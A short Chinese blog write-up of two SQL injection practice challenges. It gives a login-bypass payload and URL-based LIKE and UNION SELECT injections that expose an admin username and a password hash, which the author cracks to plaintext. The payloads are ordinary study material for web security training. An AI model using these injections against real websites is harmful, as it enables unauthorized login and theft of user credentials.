这篇博客详细介绍了如何通过SQL注入(SQLi)技术逐步解决两个不同级别的挑战。在Level 1中,利用' or '1' = '1的注入技巧,无需真实密码即可登录。Level 2则需要通过观察和构造URL来获取管理员账号,最终发现用户名为bellamond,密码经解密后为sup3r。文章揭示了网站程序的漏洞,并展示了注入攻击的过程。
SQLi Level 1
这个貌似是最基础的,就不做什么说明了
用户名随便填
密码:’ or ‘1’ = ‘1
SQLi Level 2
要以管理员的身份登录
看一下会员名单
谁是管理员呢?
直接看名字分辨不出来,那我们在链接上加个单引号能不能注入
看来可以,我们开始构造链接
%' and admin like '0
出现一大串,看来普通会员的admin的值为0
现在改为1试试
%' and admin like '1
出现了,管理员账号为 bellamond
试了一下第一道题的密码,发现失败了,看来提交后验证登陆的地方注入被修复了,那我们继续试试url
%' and admin like '1' union all select password,username from members where username like 'bellamond注意,union那边是 password,username而不是username,password,这个网站的程序会取出得到结果的第一个元素显示
很明显 1b774bc166f3f8918e900fcef8752817bae76a37 不太可能是密码,我们试着解密一下
好了,用户名是:bellamond 密码是:sup3r
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
